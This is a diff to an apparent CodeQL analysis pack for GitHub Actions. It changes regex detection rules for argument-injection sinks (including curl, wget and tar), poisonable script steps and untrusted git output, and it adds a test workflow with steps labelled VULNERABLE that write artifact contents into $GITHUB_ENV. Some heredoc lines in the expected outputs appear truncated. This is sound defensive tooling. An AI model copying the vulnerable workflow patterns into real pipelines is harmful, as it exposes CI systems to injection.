b/ql/lib/ext/config/argument_injection_sinks.yml index 95f81313168..56fced44da8 100644 --- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -5,12 +5,11 @@ extensions: # https://gtfobins.github.io/ # https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection/argument-injection data: - - ["(awk)\\s(.*?)", 2, 3] - - ["(curl)\\s(.*?)", 2, 3] - - ["(find)\\s(.*?)", 2, 3] - - ["(git)\\s(.*?)", 2, 3] - - ["(sed)\\s(.*?)", 2, 3] - - ["(tar)\\s(.*?)", 2, 3] - - ["(wget)\\s(.*?)", 2, 3] - - ["(zip)\\s(.*?)", 2, 3] + - ["(awk)\\s(.*?)", 1, 2] + - ["(find)\\s(.*?)", 1, 2] + - ["(git clone)\\s(.*?)", 1, 2] + - ["(sed)\\s(.*?)", 1, 2] + - ["(tar)\\s(.*?)", 1, 2] + - ["(wget)\\s(.*?)", 1, 2] + - ["(zip)\\s(.*?)", 1, 2] diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index aa5148d7cf6..addadd75c87 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -63,12 +63,12 @@ extensions: extensible: poisonableLocalScriptsDataModel data: # TODO: It could also be in the form of `dir/cmd` - - ["(\\.\\/[a-zA-Z0-9\\-_\\./]+)(.*?)", 2] - - ["(\\.\\s+[a-zA-Z0-9\\-_\\./]+)(.*?)", 2] # eg: . venv/bin/activate - - ["(source|sh|bash|zsh|fish)\\s+(.*?)", 3] - - ["(node)\\s+(.*?)(\\.js|\\.ts)(.*?)", 3] - - ["(python)\\s+(.*?)\\.py(.*?)", 3] - - ["(ruby)\\s+(.*?)\\.rb(.*?)", 3] - - ["(go)\\s+(generate|run)\\s+(.*?)\\.go(.*?)", 4] - - ["(dotnet)\\s+(.*?)\\.csproj(.*?)", 3] + - ["(\\.\\/[^\\s]+)\\b", 1] # eg: ./venv/bin/activate + - ["(\\.\\s+[^\\s]+)\\b", 1] # eg: . venv/bin/activate + - ["(source|sh|bash|zsh|fish)\\s+([^\\s]+)\\b", 2] + - ["(node)\\s+([^\\s]+)(\\.js|\\.ts)\\b", 2] + - ["(python)\\s+([^\\s]+)\\.py\\b", 2] + - ["(ruby)\\s+([^\\s]+)\\.rb\\b", 2] + - ["(go)\\s+(generate|run)\\s+([^\\s]+)\\.go\\b", 3] + - ["(dotnet)\\s+([^\\s]+)\\.csproj\\b", 2] diff --git a/ql/lib/ext/config/untrusted_git_commands.yml b/ql/lib/ext/config/untrusted_git_commands.yml index 0d6c9e3bfa0..b4b96a4af43 100644 --- a/ql/lib/ext/config/untrusted_git_commands.yml +++ b/ql/lib/ext/config/untrusted_git_commands.yml @@ -4,29 +4,29 @@ extensions: extensible: untrustedGitCommandsDataModel data: # FILES=$(git diff-tree --no-commit-id --name-only HEAD -r) - - [".*git\\b.*\\bdiff-tree\\b.*", "filename,multiline"] + - ["git\\b.*\\bdiff-tree\\b", "filename,multiline"] # CHANGES=$(git --no-pager diff --name-only $NAME | grep -v -f .droneignore); # CHANGES=$(git diff --name-only) - - [".*git\\b.*\\bdiff\\b.*", "filename,multiline"] + - ["git\\b.*\\bdiff\\b", "filename,multiline"] # COMMIT_MESSAGE=$(git log --format=%s -n 1) - - [".*git\\b.*\\blog\\b.*%s.*", "text,online"] + - ["git\\b.*\\blog\\b.*%s", "text,online"] # COMMIT_MESSAGE=$(git log --format=%B -n 1) - - [".*git\\b.*\\blog\\b.*%B.*", "text,multiline"] + - ["git\\b.*\\blog\\b.*%B", "text,multiline"] # COMMIT_MESSAGE=$(git log --format=oneline) - - [".*git\\b.*\\blog\\b.*oneline.*", "text,oneline"] + - ["git\\b.*\\blog\\b.*oneline", "text,oneline"] # COMMIT_MESSAGE=$(git show -s --format=%B) # COMMIT_MESSAGE=$(git show -s --format=%s) - - [".*git\\b.*\\bshow\\b.*-s.*%s.*", "text,oneline"] - - [".*git\\b.*\\bshow\\b.*-s.*%B.*", "text,multiline"] + - ["git\\b.*\\bshow\\b.*-s.*%s", "text,oneline"] + - ["git\\b.*\\bshow\\b.*-s.*%B", "text,multiline"] # AUTHOR=$(git log -1 --pretty=format:'%an') - - [".*git\\b.*\\blog\\b.*%an.*", "username,oneline"] + - ["git\\b.*\\blog\\b.*%an", "username,oneline"] # AUTHOR=$(git show -s --pretty=%an) - - [".*git\\b.*\\bshow\\b.*%an.*", "username,oneline"] + - ["git\\b.*\\bshow\\b.*%an", "username,oneline"] # EMAIL=$(git log -1 --pretty=format:'%ae') - - [".*git\\b.*\\blog\\b.*%ae.*", "email,oneline"] + - ["git\\b.*\\blog\\b.*%ae", "email,oneline"] # EMAIL=$(git show -s --pretty=%ae) - - [".*git\\b.*\\bshow\\b.*%ae.*", "email,oneline"] + - ["git\\b.*\\bshow\\b.*%ae", "email,oneline"] # BRANCH=$(git branch --show-current) - - [".*git\\b.*\\bbranch\\b.*\\b--show-current\\b.*", "branch,oneline"] + - ["git\\b.*\\bbranch\\b.*\\b--show-current\\b", "branch,oneline"] # BRANCH=$(git rev-parse --abbrev-ref HEAD) - - [".*git\\b.*\\brev-parse\\b.*\\b--abbrev-ref\\b.*", "branch,oneline"] + - ["git\\b.*\\brev-parse\\b.*\\b--abbrev-ref\\b", "branch,oneline"] diff --git a/ql/test/library-tests/commands.expected b/ql/test/library-tests/commands.expected index d5536ca1c74..12092de34ef 100644 --- a/ql/test/library-tests/commands.expected +++ b/ql/test/library-tests/commands.expected @@ -92,24 +92,23 @@ | .github/workflows/multiline2.yml:78:9:85:6 | Run Step | tee -a "$GITHUB_ENV" | | .github/workflows/multiline2.yml:85:9:89:35 | Run Step | echo 'JSON_RESPONSE< | | .github/workflows/multiline2.yml:85:9:89:35 | Run Step | tee -a "$GITHUB_ENV" | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "CHANGELOGEOF" | -| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog< event.json | @@ -124,33 +123,30 @@ | .github/workflows/multiline.yml:46:9:52:6 | Run Step | ${ISSUE_BODY} | | .github/workflows/multiline.yml:46:9:52:6 | Run Step | EOL | | .github/workflows/multiline.yml:46:9:52:6 | Run Step | FOO | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | cat << EOL | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | EOF | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | Hello | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | World | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | cat < | | .github/workflows/multiline.yml:52:9:58:6 | Run Step | sed 's/l/e/g' > file.txt | | .github/workflows/multiline.yml:58:9:63:6 | Run Step | EOF | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | cat <<-EOF | | .github/workflows/multiline.yml:58:9:63:6 | Run Step | echo "FOO=$TITLE" | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | cat issue.txt | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | sed 's/\\\\r/\\\\n/g' | | .github/workflows/multiline.yml:63:9:66:6 | Run Step | tr -d ' ' | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "$TITLE" | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "EOF" | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_ENV + - run: | + # VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr ',' '\n')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr '\n' ' ')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr -d '\n')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tr -cd '[:alpha:]_')" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | tail -n 1)" >> $GITHUB_ENV + - run: | + # NOT VULNERABLE + echo "PR_NUMBER=$(cat pr_number.txt | head -n 1)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 220eaf33663..a79053f2240 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -1,6 +1,4 @@ edges -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | -| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | @@ -29,17 +27,15 @@ edges | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | provenance | Config | nodes -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | -| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | @@ -92,13 +88,14 @@ nodes | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths #select | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | -| .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | @@ -130,3 +127,5 @@ subpaths | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 23bc7784f76..94e2af8ecaa 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -1,6 +1,4 @@ edges -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | -| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> 